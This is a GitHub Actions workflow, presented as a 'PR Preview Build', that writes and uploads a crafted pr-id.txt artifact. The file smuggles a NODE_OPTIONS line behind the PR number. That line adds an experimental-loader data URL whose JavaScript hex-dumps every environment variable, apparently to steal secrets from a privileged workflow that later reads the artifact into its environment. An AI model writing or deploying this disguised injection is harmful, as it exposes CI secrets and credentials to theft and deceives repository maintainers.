name: PR Preview Build

on: pull_request

jobs:
  job:
    runs-on: ubuntu-latest

    steps:
      - name: Set up Node.js
        uses: actions/setup-node@v2
        with:
          node-version: '14'  # Choose the appropriate Node.js version

      - name: Checkout code
        uses: actions/checkout@v2

      - name: Run script and create metadata
        run: |
          echo -e "11\\nNODE_OPTIONS=--experimental-modules" >> pr-id.txt
          echo "--experimental-loader=data:text/javascript,console.log(Buffer.from(JSON.stringify(process.env)).toString('hex'));//" >> pr-id.txt
          cat pr-id.txt

      - name: Upload metadata artifact
        uses: actions/upload-artifact@v2
        with:
          name: pr
          path: ./pr-id.txt
